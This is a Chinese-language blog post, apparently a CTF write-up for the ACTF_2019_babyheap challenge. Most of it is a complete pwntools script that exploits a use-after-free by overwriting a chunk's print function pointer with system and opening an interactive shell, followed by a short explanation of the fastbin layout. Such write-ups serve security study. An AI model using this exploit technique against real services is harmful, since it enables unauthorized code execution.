Loading... <!-- wp:paragraph --> <p>此题和<strong><a href="https://www.cjovi.icu/?p=722">BUU&XCTF-hitcontraining_uaf-WP</a></strong>很像,都是UAF,漏洞的原因也很像,漏洞点是</p> <!-- /wp:paragraph --> <!-- wp:image {"align":"center","id":860,"sizeSlug":"large","linkDestination":"none"} --> <div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/12/QQ截图20201228174146.png" alt="" class="wp-image-860"/></figure></div> <!-- /wp:image --> <!-- wp:code --> <pre class="wp-block-code"><code>#!/usr/bin/env python # coding=utf-8 from pwn import * context(log_level = 'debug') #sh = process('./ACTF_2019_babyheap') sh = remote("node3.buuoj.cn","26759") elf = ELF('./ACTF_2019_babyheap') def create(size,payload): sh.sendlineafter("Your choice: ",'1') sh.sendlineafter("Please input size: \n",str(size)) sh.sendafter("Please input content: \n",payload) def delete(index): sh.sendlineafter("Your choice: ",'2') sh.sendlineafter("Please input list index: \n",str(index)) def print_this(index): sh.sendlineafter("Your choice: ",'3') sh.sendlineafter("Please input list index: \n",str(index)) create(0x200,'index:0') create(0x200,'index:1') delete(0) delete(1) create(0x10,p64(0x602010) + p64(elf.symbols["system"])) print_this(0) sh.interactive() </code></pre> <!-- /wp:code --> <!-- wp:paragraph --> <p>exp很简单,要注意需要申请两个堆块再都free掉,这样fast bin中才会有两个payload大小为0x10的chunk,再申请的时候才能获得对index为0的content的输出函数指针的修改能力。</p> <!-- /wp:paragraph --> 最后修改:2020 年 12 月 30 日 11 : 47 PM © 允许规范转载 赞赏 如果觉得我的文章对你有用,那听听上面我喜欢的歌吧 ×Close 赞赏作者 扫一扫支付 支付宝支付 微信支付